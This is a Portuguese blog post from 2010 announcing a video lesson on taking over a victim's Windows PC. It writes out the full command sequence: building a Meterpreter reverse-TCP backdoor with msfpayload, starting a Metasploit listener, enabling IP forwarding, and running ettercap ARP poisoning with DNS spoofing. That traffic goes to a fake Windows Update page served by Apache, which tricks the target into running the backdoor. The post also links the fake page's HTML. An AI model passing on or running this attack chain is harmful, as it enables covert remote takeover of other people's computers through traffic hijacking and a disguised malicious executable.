Nela aula eu mostro como usar engenharia social para efetuar um ataque. Na vídeo eu faço um MITM para redirecionar todo trafego de um host para meu micro, crio um backdoor com metasploit, faço uma pagina falsa de atualização do Windows que está em meu micro e inicio o apache, e espero que nosso alvo caia na engenharia social e execute o arquivo para que possamos ter acesso a maquina dele.
Programas usados:
Metasploit
Ettercap
Comandos:
msfpayload windows/meterpreter/reverse_tcp LHOST=SeuIP LPORT=8080 X > /NomeDoArquivo.exe
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost SeuIP
set lport 8080
exploit
*.*.* A SeuIP
echo 1 > /proc/sys/net/ipv4/ip_forward
ettercap -T -q -P dns_spoof -M ARP /IP do Router/ /IP do alvo/
/etc/init.d/apache2 start
HTML da pagina falsa:
http://pastebin.com/PnVYNBqn
http://img831.imageshack.us/img831/9779/microsoft.jpg
Informações:
Metasploit - www.metasploit.com
Ettercap - http://ettercap.sourceforge.net/index.php
MITM - http://en.wikipedia.org/wiki/Man-in-the-middle_attack
Backdoor - http://pt.wikipedia.org/wiki/Backdoor
Sobre a falha: http://www.microsoft.com/brasil/technet/security/Bulletin/MS08-067.mspx
Sobre o vídeo:
Tamanho: 34.5 mb
Formato: avi
Duração: 10:46 min
Musica: Tokens - The Lion Sleeps Tonight
Baixar: http://www.4shared.com/file/aAg8RG3f/Atualizao_falsa-MITMEttercapme.html
domingo, 18 de julho de 2010
Atualização falsa [MITM+ettercap+metasploit+ES]
Assinar:
Postar comentários (Atom)
0 comentários:
Postar um comentário